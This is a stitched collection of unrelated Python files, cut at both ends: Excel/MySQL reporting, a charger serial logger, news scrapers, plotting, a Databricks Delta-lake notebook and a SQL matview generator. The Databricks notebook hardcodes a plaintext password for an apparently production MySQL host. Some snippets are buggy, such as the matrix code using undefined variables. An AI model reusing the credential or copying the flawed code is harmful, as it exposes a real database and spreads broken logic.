# currentCell.alignment = Alignment(horizontal='left', indent=1, wrap_text=True)
wb.save('./IEA QUARTERLY FILE_WITH MODEL_PW_Country.xlsx')
except Error as e:
print("print", e)
#
#
# def delta(wb): #### to find difference between values of two sheets
# print(wb.get_sheet_names())
# # sheet = wb.get_sheet_by_name('Delta_annual')
# # wb.remove_sheet(sheet)
# # sheet = wb.get_sheet_by_name('Delta_Quarter')
# # wb.remove_sheet(sheet)
# try:
# if 'Delta_annual' in wb.sheetnames:
# print('sheet1 exists')
# else:
# sheet = wb.get_sheet_by_name('Annual')
# ws2 = wb.copy_worksheet(sheet)
# ws2.title = 'Delta_annual'
# max_col = (ws2.max_column)
# print(max_col)
# max_row = (ws2.max_row)
# print(max_row)
# sheet_copy = wb.get_sheet_by_name('Annual_Previous')
# # sheet_copy.cell(row=11, column=2).value = '45'
# for col in range(2, max_col):
# period = ws2.cell(row=1, column=col).value
# if (period == '2025-Y'):
# break
# for row in range(11, 112):
# value1 = sheet.cell(row=row, column=col).value
# value2 = sheet_copy.cell(row=row, column=col).value
# print(value1, value2)
# if value1 == None or value2 == None:
# pass
# else:
# try:
# val = int(value1) - int(value2)
# ws2.cell(row=row, column=col).value = val
# except ValueError:
# pass
# except Exception as e:
# print(str(e))
# try:
# if 'Delta_Quarter' in wb.sheetnames:
# print('sheet2 exists')
# else:
# sheet = wb.get_sheet_by_name('Quarter')
# ws2 = wb.copy_worksheet(sheet)
# ws2.title = 'Delta_Quarter'
# max_col = (ws2.max_column)
# print(max_col)
# max_row = (ws2.max_row)
# print(max_row)
# sheet_copy = wb.get_sheet_by_name('Quarter_Previous')
# for col in range(2, max_col):
# period = ws2.cell(row=1, column=col).value
# if (period == '2025-Y'):
# break
# for row in range(11, 112):
# value1 = sheet.cell(row=row, column=col).value
# value2 = sheet_copy.cell(row=row, column=col).value
# print(value1, value2)
# if value1 == None or value2 == None:
# pass
# else:
# try:
# val = int(value1) - int(value2)
# ws2.cell(row=row, column=col).value = val
# except ValueError:
# pass
# except Exception as e:
# print(str(e))
wb.save('./IEA QUARTERLY FILE_WITH MODEL_PW_Country.xlsx')
def match_excel():
fetch = fetch_excel('Annual')
match_fetch = fetch[1]
print(match_fetch)
sheet = wb.get_sheet_by_name('Annual')
max_col = (sheet.max_column)
print(max_col)
max_row = (sheet.max_row)
db_result = {}
cursor.execute(
"select * from ExcelMapping")
result = cursor.fetchall()
# print(result)
for results in result:
# print(results[0])
db_result[results[0]] =results[1]
print(db_result)
#
for key in db_result:
if key in match_fetch:
if (db_result[key] == match_fetch[key]):
print(key)
value = db_result[key]
else:
print(key)
f = open("error_log.txt","a")
f.write("error in row")
f.write(key)
value = db_result[key]
f.write(str(value))
f.write('\n')
# #
# callproc_script()
# regions("Annual")
# match_excel()
# annual_data()
quarter_data()
# quarter_data()
# wb.save('./IEA QUARTERLY FILE_WITH MODEL_PW_country.xlsx')
# print("anual data goessss")
# annual_data()
# delta(wb)
# fetch = fetch_excel('Quarter')
# print(fetch)
except Exception as e:
print("Error while connecting to MySQL",e)
finally:
# closing database connection.
if (connection.is_connected()):
cursor.close()
connection.close()
print("MySQL connection is closed")
|
import serial, sys, io, time
"""
Logger for iMax-B6, Turnigy Accucel-6 and similar 4-button chargers
by Andy Gock
CSV output in format:
time,minutes,voltage,current,charge
If using Windows:
Download wintee: http://code.google.com/p/wintee/
(allows logging to file AND viewing output at the same time)
Run (Win):
del file.txt
python log.py COM14 | wtee file.txt
Run (Linux/Mac):
python log.py /dev/ttyUSB0 | tee file.txt
Press Ctrl+C to terminate.
"""
""" From: https://gist.github.com/7h3rAm/5603718 """
def hexdump(src, length=16, sep='.'):
FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or sep for x in range(256)])
lines = []
for c in xrange(0, len(src), length):
chars = src[c:c+length]
hex = ' '.join(["%02x" % ord(x) for x in chars])
if len(hex) > 24:
hex = "%s %s" % (hex[:24], hex[24:])
printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or sep) for x in chars])
lines.append("%08x: %-*s |%s|\n" % (c, length*3, hex, printable))
print ''.join(lines)
""" Script starts here """
if len(sys.argv) == 1:
print "Usage:"
print " python " + sys.argv[0] + " SERIAL_PORT"
sys.exit()
try:
ser = serial.Serial(sys.argv[1])
if not ser:
print "Could not open serial port: " + str(sys.argv[1])
sys.exit()
except:
print "Could not open serial port: " + str(sys.argv[1])
sys.exit()
pos = 0
data = "" # binary string
frames_read = 0
time_start = 0
while True:
c = ser.read()
if c == '{':
#print "---\n"
pos = 0
data = ""
data += c
elif c == '}':
pos += 1
data += c
else:
pos += 1
data += c
if c == '}': # End of frame marker
if pos == 75: # Correct frame size
sample = {}
if frames_read == 0:
time_start = time.time()
sample['time'] = 0
else:
sample['time'] = round(time.time() - time_start,3)
frames_read += 1
#hexdump(data)
#continue
# Protocol reverse engineered by
# Ref: http://blog.dest-unreach.be/2012/01/29/imax-b6-charger-protocol-reverse-engineered
sample['current'] = ord(data[33])-128 + (ord(data[34])-128)/100.0
sample['voltage'] = ord(data[35])-128 + (ord(data[36])-128)/100.0
sample['input_voltage'] = ord(data[41])-128 + (ord(data[42])-128)/100.0
sample['charge'] = (ord(data[43])-128)*100 + (ord(data[44])-128)
sample['minutes'] = ord(data[70])-128
#print sample
if frames_read == 1:
# Header row
print "Time(s),Minutes,Voltage(V),Current(A),Charge(mAh)"
print ','.join([
str(sample['time']),
str(sample['minutes']),
str(sample['voltage']),
str(sample['current']),
str(sample['charge'])
])
sys.stdout.flush()
ser.close()
|
def getPrimeFactorsDict(number):
current = number
checking = 2
factors = dict()
while checking <= current:
while current % checking == 0:
current = current / checking
factors[checking] = factors.get(checking, 0)+ 1
checking+=1
return factors
def getSmallestDividable(number):
soFar = dict()
for i in range(number+1):
primes = getPrimeFactorsDict(i)
for a in primes:
if primes[a] < soFar.get(a, 0):
primes[a] = soFar[a]
soFar.update(primes)
total = 1
for a in soFar:
for x in range(soFar[a]):
total = total * a
return total
print(getSmallestDividable(int(input("Input number to find smallest dividable of: "))))
|
import sys
from enum import Enum
class Acid(Enum):
NON_METAL = 'non-metal acid'
POLYATOMIC = 'polyatomic acid'
NOT_ACID = 'not an acid'
def name_acid(text: str) -> Acid:
hydro = text.startswith('hydro')
poly = text.endswith('ic')
if hydro and poly:
return Acid.NON_METAL
elif poly:
return Acid.POLYATOMIC
return Acid.NOT_ACID
def main():
lines = [line.strip() for line in sys.stdin.readlines()][1:]
for line in lines:
print(name_acid(line).value)
if __name__ == '__main__':
main()
|
#!/usr/bin/env python3.5
# -*- coding: utf-8 -*-
# @Time : 18-3-24 下午1:33
# @Author : 无敌小龙虾
# @File : GetNewsClass.py
# @Software: PyCharm
import re
import requests
from bs4 import BeautifulSoup
from lxml import etree
class GetNews:
def __init__(self):
self.headers = {
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 '
'(KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.8',
}
def GetHtml(self, url):
try:
r = requests.get(url, headers=self.headers, timeout=30)
r.raise_for_status()
r.encoding = r.apparent_encoding
return r.text
except KeyError as e:
print(e)
pass
@staticmethod
def ChangeTime(time):
t = time[0:10]
t1 = t[0:4]
t2 = t[5:7]
t3 = t[8:]
t = t1 + t2 + t3
return t
@staticmethod
def CleanContent(content):
content = re.sub("</?\w+[^>]*>", "", str(content))
content = re.sub("[\n \r]", "", str(content))
content = re.sub('[\u3000\xa0]', "", content)
return content
def GetSinaNews(self, url, flag=1):
News = []
bsobj = self.GetHtml(url)
select = BeautifulSoup(bsobj, "lxml")
if flag:
title = select.find('title').get_text()
time = select.find('span', {"class": "date"}).get_text()
content = select.find('div', {"class": "article", "id": "article"})
else:
title = select.find('title').get_text()
time = select.find('span', {"id": "navtimeSource"}).get_text()
content = select.find('div', {"id": "artibody"})
title = title.strip()
time = time.strip()
time = self.ChangeTime(time)
content = self.CleanContent(content)
News.append([title, time, content])
return News
def GetSohuNews(self, url):
News = []
bsobj = self.GetHtml(url)
select = etree.HTML(bsobj)
title = select.xpath(
'//*[@id="article-container"]/div[2]/div[1]/div[1]/h1')
title = title[0].text
time = select.xpath('//*[@id="news-time"]')
time = time[0].text.strip()
time = self.ChangeTime(time)
content = select.xpath('//*[@id="mp-editor"]')
info = content[0].xpath('string(.)').strip()
info = self.CleanContent(info)
info = info[:-14]
News.append([title, time, info])
return News
def GetFengNews(self, url, flag=1):
News = []
bsobj = self.GetHtml(url)
if flag:
select = etree.HTML(bsobj)
title = select.xpath('//*[@id="artical_topic"]')
title = title[0].text
time = select.xpath('//*[@id="artical_sth"]/p/span[1]')
time = time[0].text.strip()
content = select.xpath('//*[@id="main_content"]')
content = content[0].xpath('string(.)').strip()
else:
select = BeautifulSoup(bsobj, "lxml")
title = select.find('h1', {"id": "artical_topic"}).get_text()
title = title.strip()
News.append(title)
time = select.find('div', {"id": "artical_sth"}).get_text()
time = time.strip()
content = select.find('div', {"id": "artical_real"}).get_text()
time = self.ChangeTime(time)
info = self.CleanContent(content)
News.append([title, time, info])
return News
def GetWangYNews(self, url):
News = []
bsobj = self.GetHtml(url)
select = etree.HTML(bsobj)
title = select.xpath('//*[@id="epContentLeft"]/h1')
title = title[0].text
time = select.xpath('//*[@id="epContentLeft"]/div[1]')
time = time[0].text.strip()
time = self.ChangeTime(time)
content = select.xpath('//*[@id="endText"]')
info = content[0].xpath('string(.)').strip()
info = self.CleanContent(info)
News.append([title, time, info])
return News
def GetXinHNews(self, url, flag=1):
News = []
bsobj = self.GetHtml(url)
if flag:
select = etree.HTML(bsobj)
title = select.xpath('/html/body/div[2]/div[3]/div/div[1]')
title = title[0].text.strip()
time = select.xpath('/html/body/div[2]/div[3]/div/div[2]/span[1]')
time = time[0].text.strip()
content = select.xpath('//*[@id="p-detail"]')
content = content[0].xpath('string(.)').strip()
else:
select = BeautifulSoup(bsobj, "lxml")
title = select.find('h1', {"id": "title"}).get_text()
title = title.strip()
time = select.find('span', {"class": "time"}).get_text()
time = time.strip()
content = select.find('div', {"class": "article"})
time = self.ChangeTime(time)
info = self.CleanContent(content)
News.append([title, time, info])
return News
def GetTencentNews(self, url):
News = []
bsobj = self.GetHtml(url)
select = etree.HTML(bsobj)
soup = BeautifulSoup(bsobj, 'html.parser')
title = select.xpath(
'//*[@id="Main-Article-QQ"]/div/div[1]/div[1]/div[1]/h1')
title = title[0].text.strip()
time = soup.find('span', {'class': 'a_time'})
time = time.text.strip()
time = self.ChangeTime(time)
content = soup.find_all('p', {'class': 'text'})
info = ""
for son in content:
info += str(son.text)
info = self.CleanContent(info)
News.append([title, time, info])
return News
def GetPengPNews(self, url):
News = []
bsobj = self.GetHtml(url)
soup = BeautifulSoup(bsobj, 'html.parser')
select = etree.HTML(bsobj)
title = select.xpath('//h1//text()')
title = title[0].strip()
time = soup.find('div', {'class': 'news_about'})
time = time.find_all('p')[1]
time = time.text.strip()
time = self.ChangeTime(time)
content = soup.find(
'div', {'class': 'news_txt', 'data-size': 'standard'}).text
content = self.CleanContent(content)
News.append([title, time, content])
return News
|
# -*- coding: utf-8 -*-
"""
箱图
当我们的数据是num_subj*num_var,且有几个诊断组时,我们一般希望把var name作为x,把var value作为y,把诊断组作为hue
来做箱图,以便于观察每个var的组间差异。
此时,用于sns的特殊性,我们要将数据变换未长列的形式。
行数目为:num_subj*num_var。列数目=3,分别是hue,x以及y
input:
data_path=r'D:\others\彦鸽姐\final_data.xlsx'
x_location=np.arange(5,13,1)#筛选数据的列位置
未来改进:封装为类,增加可移植性
@author: lenovo
"""
#==========================================================
# 载入绘图模块
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
#==========================================================
class BoxPlot():
# initial parameters
def __init__(self,
data_path=r'D:\others\彦鸽姐\final_data.xlsx',
x_location=np.arange(5,13,1),
x_name='脑区',
y_name='reho',
hue_name='分组',
hue_order=[2,1],
if_save_figure=0,
figure_name='violin.tiff'):
#======================================
self.data_path=data_path
self.x_location=x_location
self.x_name=x_name
self.y_name=y_name
self.hue_name=hue_name
self.hue_order=hue_order
self.if_save_figure=if_save_figure
self.figure_name=figure_name
#====================================================
def data_preparation(self):
# load data
df = pd.read_excel(self.data_path,index=False)
# 筛选数据
df_selected=df.iloc[:,self.x_location]
# 将'[]'去除
df_selected = pd.DataFrame(df_selected, dtype=np.str)
df_selected=df_selected.mask(df_selected =='[]', None, inplace=False)
df_selected=df_selected.dropna()
col_to_float=list(set(list(df_selected.columns))-set([self.hue_name]))
df_selected[col_to_float] = pd.DataFrame(df_selected[col_to_float], dtype=np.float32)
# a=pd.Series(df_selected['HAMD']).str.contains('\d',regex=False)
#把需要呈现的数据concat到一列
n_subj,n_col=df_selected.shape
df_long=pd.DataFrame([])
for nc in range(n_col):
df_long=pd.concat([df_long,df_selected.iloc[:,nc]])
# 整理columns
col_name=list(df_selected.columns)
col_name_long=[pd.DataFrame([name]*n_subj) for name in col_name]
col_name_long=pd.concat(col_name_long)
#整理分组标签
group=pd.DataFrame([])
for i in range(n_col):
group=pd.concat([group,df[self.hue_name].loc[df_selected.index]])
#整合
col_name_long.index=df_long.index # 解决index不统一问题
self.data=pd.concat([group,col_name_long,df_long],axis=1)
# 加列名
self.data.columns=[self.hue_name, self.x_name, self.y_name]
return self
#=========================================================================
def plot(self):
# plot
self.f,self.ax= plt.subplots()
# box框架
self.data=self.data_preparation().data
self.ax=sns.boxplot(x=self.x_name,
y=self.y_name,
hue=self.hue_name,
order=None,
hue_order=self.hue_order,
data=self.data,
palette="Set1",
saturation=0.7,
width=0.5,
fliersize=2,
whis=None,
notch=False,
dodge=True)
#设置网格
# plt.grid(axis="y",ls='--',c='g')
# 设置label,以及方位
label_x = self.ax.get_xticklabels()
label_y = self.ax.get_yticklabels()
plt.setp(label_x, size=15,rotation=0, horizontalalignment='right')
plt.setp(label_y, size=15,rotation=0, horizontalalignment='right')
# save figure
if self.if_save_figure:
self.f.savefig(self.figure_name, dpi=300, bbox_inches='tight')
return self
if __name__ == '__main__':
sel = BoxPlot(data_path=r'D:\WorkStation_2018\WorkStation_dynamicFC_V3\Data\results_cluster\results_of_individual\temploral_properties.xlsx',
x_location=np.arange(1, 3, 1),
hue_name='group',
hue_order=[1, 3, 2, 4])
df =sel.data_preparation()
sel.plot()
plt.savefig('MDT.tif',dpi=600)
|
# Databricks notebook source
# Select Libraries => Install New => Select Library Source = "Maven" => Coordinates => Search Packages => Select Maven Central => Search for the package required. Example: mysql-connector-java library => Select the version required => Install
# COMMAND ----------
# dbutils.widgets.removeAll()
# Storage Path in Lake
dbutils.widgets.text("Persisted_File_Path", "/vendeltalakeadw/appian")
# TableName
dbutils.widgets.text("Persisted_Table", "Permit")
dbutils.widgets.text("Merge_Condition", "sink.permit_id = source.permit_id")
dbutils.widgets.text("Merge_Filter", " AND SomeInt < 10")
# COMMAND ----------
secretScope = "key-vault-secrets"
secretServicePrincipalId = "ServicePrincipalClientId"
secretServicePrincipalKey = "ServicePrincipalKey"
secretTenantId = "TenantId"
adlsFileSystem = "persisted"
adlsAccountName = "vendeltalakeadls"
# COMMAND ----------
try:
dbutils.fs.unmount("/mnt/" + adlsFileSystem)
except Exception as e:
print("{} already unmounted".format(adlsFileSystem))
# COMMAND ----------
configs = {"fs.azure.account.auth.type": "OAuth",
"fs.azure.account.oauth.provider.type": "org.apache.hadoop.fs.azurebfs.oauth2.ClientCredsTokenProvider",
"fs.azure.account.oauth2.client.id": dbutils.secrets.get(scope = secretScope, key = secretServicePrincipalId),
"fs.azure.account.oauth2.client.secret": dbutils.secrets.get(scope = secretScope, key = secretServicePrincipalKey),
"fs.azure.account.oauth2.client.endpoint": "https://login.microsoftonline.com/" + dbutils.secrets.get(scope = secretScope, key = secretTenantId) + "/oauth2/token"}
# Mount ADLS file system
try:
dbutils.fs.mount(
source = "abfss://" + adlsFileSystem + "@" + adlsAccountName +".dfs.core.windows.net/",
mount_point = "/mnt/" + adlsFileSystem,
extra_configs = configs)
except Exception as e:
print("Error: {} already mounted. Run unmount first".format(adlsFileSystem))
# COMMAND ----------
jdbcHostname = "prodappianreporting.mysql.database.azure.com"
username = "prodReporting@prodappianreporting"
password = "PXwLgnfbgEAzIJZx"
jdbcDatabase = "appian"
jdbcPort = 3306
# COMMAND ----------
jdbcUrl = "jdbc:mysql://{0}:{1}/{2}".format(jdbcHostname, jdbcPort, jdbcDatabase)
connectionProperties = {
"user" : username,
"password" : password,
"driver" : "com.mysql.jdbc.Driver"
}
# COMMAND ----------
tablename = dbutils.widgets.get("Persisted_Table")
tableView = "transview"
pushdown_query = "(select * from {0}) {1}".format(tablename, tablename)
df = spark.read.jdbc(url=jdbcUrl, table=pushdown_query, properties=connectionProperties)
df.createOrReplaceTempView(tableView)
# COMMAND ----------
database = "persisted"
spark.sql("CREATE DATABASE IF NOT EXISTS {DATABASE}".format(DATABASE = database))
persistedFileSystem = "persisted"
mountPath = "/mnt/" + persistedFileSystem + dbutils.widgets.get("Persisted_File_Path") + "/" + tablename
spark.sql("""CREATE TABLE IF NOT EXISTS {DATABASE}.{TABLE}
USING DELTA
LOCATION '{PATH}'
AS SELECT * FROM {VIEW_TRANS}""".format(DATABASE = database, TABLE = tablename, PATH = mountPath, VIEW_TRANS = tableView))
condition = dbutils.widgets.get("Merge_Condition")
spark.sql("""MERGE INTO {DATABASE}.{TABLE} AS sink
USING {View_Trans} AS source
ON {CONDITION}
WHEN MATCHED THEN
UPDATE SET *
WHEN NOT MATCHED THEN
INSERT *""".format(DATABASE=database, TABLE=tablename, View_Trans=tableView, CONDITION = condition ))
spark.sql("""DELETE FROM {DATABASE}.{TABLE} as sink
WHERE NOT EXISTS (SELECT 1
FROM {View_Trans} as source
where {CONDITION})""".format(DATABASE=database, TABLE=tablename,View_Trans=tableView,CONDITION = condition))
# COMMAND ----------
# optimize
display(spark.sql("optimize {db}.{table}".format(db = database, table = tablename)))
# COMMAND ----------
display(spark.sql("describe history {DATABASE}.{TABLE}".format(DATABASE = database, TABLE = tablename)))
# COMMAND ----------
# MAGIC %sql
# MAGIC select * from persisted.Permit_Application version as of 1 where permit_application_id = 69201
# MAGIC union
# MAGIC select * from persisted.Permit_Application version as of 2 where permit_application_id = 69201
# MAGIC union
# MAGIC select * from persisted.Permit_Application version as of 3 where permit_application_id = 69201
# COMMAND ----------
# MAGIC %sql
# MAGIC select * from persisted.Permit version as of 3
# MAGIC except
# MAGIC select * from persisted.Permit version as of 1
# COMMAND ----------
|
import time
class StopWatch:
def __init__(self):
self.start_time = time.time() # record the first timestamp
self.end_time = -1
def start(self):
self.start_time = time.time()
self.end_time = -1
def stop(self):
self.end_time = time.time()
def elapsed_time(self):
self.end_time -= self.start_time
# boundary case? never started
# 1. end_time = -1 never stopped
# 2. start stop start: endtime! = 0
if self.end_time < 0:
return None
return round(self.end_time, 1)
sw = StopWatch ()
time.sleep (0.1)
sw.stop()
print(sw.elapsed_time())
sw.start()
time.sleep(0.2)
print(sw.elapsed_time())
sw.stop()
print(sw.elapsed_time()) |
n11,m1=map(int,input().split())
a1=[]
b1=[]
for i1 in range(n11):
a1.append(list(map(int,input().split())))
for i1 in range(n11):
for j1 in range(m1):
if a1[i1][j1]==0:
b1.append(i1)
b1.append(j1)
for i1 in range(0,len(b1),2):
for h1 in range(m1):
a[b[i1]][h1]=0
for h1 in range(n11):
a1[h1][b1[i1+1]]=0
for i1 in range(n11):
print(*a1[i1])
|
import glob
import json
import os
import sys
from uuid import uuid4
# Usage: python matview_sql_generator.py (from usaspending_api/database_scripts/matview_generator)
# ^--- Will clobber files in usaspending_api/database_scripts/matviews
'''
POSTGRES INDEX FORMAT
CREATE [ UNIQUE ] INDEX [ name ] ON table_name [ USING method ]
( { column_name | ( expression ) } [ COLLATE collation ]
[ opclass ] [ ASC | DESC ] [ NULLS { FIRST | LAST } ] [, ...] )
[ WITH ( storage_parameter = value [, ... ] ) ]
[ WHERE predicate ]
EXAMPLE SQL DESCRIPTION JSON FILE:
{ "final_name": "example_matview",
"matview_sql": [
"SELECT",
" \"transaction_normalized\".\"action_date\",",
" \"transaction_normalized\".\"fiscal_year\",",
" \"awards\".\"type\",",
" \"awards\".\"category\",",
"FROM",
" \"awards\"",
"LEFT OUTER JOIN",
" \"transaction_normalized\" ON (\"awards\".\"latest_transaction_id\" = \"transaction_normalized\".\"id\")",
"WHERE",
" \"transaction_normalized\".action_date >= '2007-10-01'",
"ORDER BY",
" \"action_date\" DESC"
],
"index": {
"name": "<name>",
"columns": [
{
"name": "<col name>",
"order": "DESC|ASC NULLS FIRST|LAST",
"collation": "<collation>",
"opclass": "<opclass"
}
],
"where": "<where clause>",
"unique": true,
"method": "<method>"
}
}
'''
TEMPLATE = {
'create_matview': 'CREATE MATERIALIZED VIEW {} AS\n{};',
'drop_matview': 'DROP MATERIALIZED VIEW IF EXISTS {} CASCADE;',
'rename_matview': 'ALTER MATERIALIZED VIEW {}{} RENAME TO {};',
'cluster_matview': 'CLUSTER VERBOSE {} USING {};',
'refresh_matview': 'REFRESH MATERIALIZED VIEW CONCURRENTLY {} WITH DATA;',
'analyze': 'ANALYZE VERBOSE {};',
'vacuum': 'VACUUM ANALYZE VERBOSE {};',
'create_index': 'CREATE {}INDEX {} ON {} USING {}({}){}{};',
'rename_index': 'ALTER INDEX {}{} RENAME TO {};',
'grant_select': 'GRANT SELECT ON {} TO {};',
}
HEADER = [
'--------------------------------------------------------',
'-- Created using matview_sql_generator.py --',
'-- The SQL definition is stored in a json file --',
'-- Look in matview_generator for the code. --',
'-- --',
'-- DO NOT DIRECTLY EDIT THIS FILE!!! --',
'--------------------------------------------------------',
]
MAX_NAME_LENGTH = 45 # postgres max 63 ascii chars
RANDOM_CHARS = str(uuid4())[:8]
CLUSTERING_INDEX = None
DEST_FOLDER = '../matviews/'
OVERWRITE_FILE = True
def ingest_json(path):
with open(path) as f:
doc = json.load(f)
return doc
def create_index_string(matview_name, index_name, idx):
if idx.get('cluster_on_this', False):
global CLUSTERING_INDEX
CLUSTERING_INDEX = index_name
idx_method = idx.get('method', 'BTREE') # if missing, defaults to BTREE
idx_unique = 'UNIQUE ' if idx.get('unique', False) else ''
idx_where = ' WHERE ' + idx['where'] if idx.get('where', None) else ''
idx_with = ''
if idx_method.upper() == 'BTREE':
idx_with = ' WITH (fillfactor = 100)' # reduce btree index size by 10%
idx_cols = []
for col in idx['columns']:
index_def = [col["name"]] # Critial to have col or expression. Exception if missing
if col.get('order', None): # if missing, skip and let postgres default to ASC
index_def.append(col['order'])
if col.get('collation', None): # if missing, skip and let postgres use default
index_def.append('COLLATE ' + col['collation'])
if col.get('opclass', None): # if missing, skip and let postgres choose
index_def.append(col['opclass'])
idx_cols.append(' '.join(index_def))
idx_str = TEMPLATE['create_index'].format(
idx_unique,
index_name,
matview_name,
idx_method,
', '.join(idx_cols),
idx_with,
idx_where,
)
return idx_str
def make_sql_header():
return ['\n'.join(HEADER)]
def make_matview_drops(final_matview_name):
matview_temp_name = final_matview_name + '_temp'
matview_archive_name = final_matview_name + '_old'
return [
TEMPLATE['drop_matview'].format(matview_temp_name),
TEMPLATE['drop_matview'].format(matview_archive_name)
]
def make_matview_create(final_matview_name, sql):
matview_sql = '\n'.join(sql)
matview_temp_name = final_matview_name + '_temp'
return [TEMPLATE['create_matview'].format(matview_temp_name, matview_sql)]
def make_matview_refresh(matview_name):
return [
TEMPLATE['refresh_matview'].format(matview_name),
TEMPLATE['analyze'].format(matview_name)
]
def make_indexes_sql(sql_json, matview_name):
unique_name_list = []
create_indexes = []
rename_old_indexes = []
rename_new_indexes = []
for idx in sql_json['indexes']:
if len(idx['name']) > MAX_NAME_LENGTH:
raise Exception('Desired index name is too long. Keep under {} chars'.format(MAX_NAME_LENGTH))
final_index = 'idx_' + RANDOM_CHARS + '__' + idx['name']
unique_name_list.append(final_index)
tmp_index = final_index + '_temp'
old_index = final_index + '_old'
idx_str = create_index_string(matview_name, tmp_index, idx)
create_indexes.append(idx_str)
rename_old_indexes.append(TEMPLATE['rename_index'].format('IF EXISTS ', final_index, old_index))
rename_new_indexes.append(TEMPLATE['rename_index'].format('', tmp_index, final_index))
if len(unique_name_list) != len(set(unique_name_list)):
raise Exception('Name collision detected. Examine JSON file')
print('There are {} index creations'.format(len(create_indexes)))
return create_indexes, rename_old_indexes, rename_new_indexes
def make_modification_sql(matview_name):
global CLUSTERING_INDEX
sql_strings = []
if CLUSTERING_INDEX:
print('*** This matview will be clustered on {} ***'.format(CLUSTERING_INDEX))
sql_strings.append(TEMPLATE['cluster_matview'].format(matview_name, CLUSTERING_INDEX))
sql_strings.append(TEMPLATE['analyze'].format(matview_name))
sql_strings.append(TEMPLATE['grant_select'].format(matview_name, 'readonly'))
return sql_strings
def make_rename_sql(matview_name, old_indexes, new_indexes):
matview_temp_name = matview_name + '_temp'
matview_archive_name = matview_name + '_old'
sql_strings = []
sql_strings.append(TEMPLATE['rename_matview'].format('IF EXISTS ', matview_name, matview_archive_name))
sql_strings += old_indexes
sql_strings.append('')
sql_strings.append(TEMPLATE['rename_matview'].format('', matview_temp_name, matview_name))
sql_strings += new_indexes
return sql_strings
def create_all_sql_strings(sql_json):
''' Desired ordering of steps for final SQL:
1. Drop existing "_temp" and "_old" matviews
2. Create new matview
3. Create indexes for new matview
4. (optional) Cluster matview on index
5. analyze verbose <matview>
6. Rename existing matview, append with _old
7. Rename all existing matview indexes to avoid name collisions
8. Rename new matview
9. Rename new matview indexes
'''
final_sql_strings = []
matview_name = sql_json['final_name']
matview_temp_name = matview_name + '_temp'
create_indexes, rename_old_indexes, rename_new_indexes = make_indexes_sql(sql_json, matview_temp_name)
final_sql_strings.extend(make_sql_header())
final_sql_strings.extend(make_matview_drops(matview_name))
final_sql_strings.append('')
final_sql_strings.extend(make_matview_create(matview_name, sql_json['matview_sql']))
final_sql_strings.append('')
final_sql_strings += create_indexes
final_sql_strings.append('')
final_sql_strings.extend(make_rename_sql(matview_name, rename_old_indexes, rename_new_indexes))
final_sql_strings.append('')
final_sql_strings.extend(make_modification_sql(matview_name))
return final_sql_strings
def write_sql_file(str_list, filename):
fname = filename + '.sql'
if not OVERWRITE_FILE:
sequence = 0
while os.path.isfile(fname):
sequence += 1
fname = filename + str(sequence) + '.sql'
print('Creating file: {}'.format(fname))
with open(fname, 'w') as f:
fstring = '\n'.join(str_list)
f.write(fstring)
f.write('\n')
def create_componentized_files(sql_json):
filename_base = DEST_FOLDER + 'componentized/' + sql_json['final_name']
matview_name = sql_json['final_name']
matview_temp_name = matview_name + '_temp'
create_indexes, rename_old_indexes, rename_new_indexes = make_indexes_sql(sql_json, matview_temp_name)
# final_sql_strings.extend(make_sql_header())
# final_sql_strings.extend(make_matview_drops(matview_name))
sql_strings = make_sql_header() + make_matview_drops(matview_name)
write_sql_file(sql_strings, filename_base + '__drops')
sql_strings = make_sql_header() + make_matview_create(matview_name, sql_json['matview_sql'])
write_sql_file(sql_strings, filename_base + '__matview')
sql_strings = make_sql_header() + create_indexes
write_sql_file(sql_strings, filename_base + '__indexes')
sql_strings = make_sql_header() + make_modification_sql(matview_name)
write_sql_file(sql_strings, filename_base + '__mods')
sql_strings = make_sql_header() + make_rename_sql(matview_name, rename_old_indexes, rename_new_indexes)
write_sql_file(sql_strings, filename_base + '__renames')
if 'refresh' in sql_json and sql_json['refresh'] is True:
sql_strings = make_sql_header() + make_matview_refresh(matview_name)
write_sql_file(sql_strings, filename_base + '__refresh')
# final_sql_strings.append('')
# final_sql_strings += create_indexes
# final_sql_strings.append('')
# final_sql_strings.extend(make_modification_sql(matview_temp_name))
# final_sql_strings.append('')
# final_sql_strings.extend(make_rename_sql(matview_name, rename_old_indexes, rename_new_indexes))
# final_sql_strings.append('')
def create_monolith_file(sql_json):
sql_strings = create_all_sql_strings(sql_json)
print('Preparing to store "{}" in sql file'.format(sql_json['final_name']))
write_sql_file(sql_strings, DEST_FOLDER + sql_json['final_name'])
def main(source_file):
try:
sql_json = ingest_json(source_file)
except Exception as e:
print(e)
raise SystemExit
create_monolith_file(sql_json)
create_componentized_files(sql_json)
print('Done')
if __name__ == '__main__':
if len(sys.argv) > 1:
print('Creating matview SQL using {}'.format(sys.argv[1]))
main(sys.argv[1])
else:
ans = input('Would you like to run on all json files in dir? (y/N): ')
if ans.lower() in ['y', 'yes']:
all_files = glob.glob('*.json')
for f in all_files:
RANDOM_CHARS = str(uuid4())[:8]
print('\n==== {}'.format(f))
main(f)
else:
print('Quitting....\n')
|
#!/usr/bin/env python2.7
"""
Ted Satcher
CS 640
Fall 2012
Final Exam
File: problem4.py
This executable is for Problem 4 for the final exam.
It uses the Parzen window approach to calculate
an estimated density function from a collection
of sample patterns.
"""
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
import parzen_window as pw
import make_data as md
def main():
fnm = 'p4.data'
# Read the data into a one-dimensional array
data = np.array(md.read_data(fnm)).squeeze()
h = 1 # Window size
# Create plots for the zero-one window function
phi = pw.zero_one(h)
print("Zero-one window function...")
plot_data(phi, data, "Zero-One Window", "images/zero-one.eps")
# Create plots for the Gauss window function
phi = pw.gauss(h)
print("Gauss window function...")
plot_data(phi, data, "Gauss Window", "images/gauss.eps")
def plot_data(phi, data, mytitle, fnm):
"""This function calculates a new density function
for each sample size. It then evaluates the density
function for a range of values and finally plots the
results."""
x = np.linspace(-4,10,100) # x values for plotting
sample_sizes = [100, 1000, 10000]
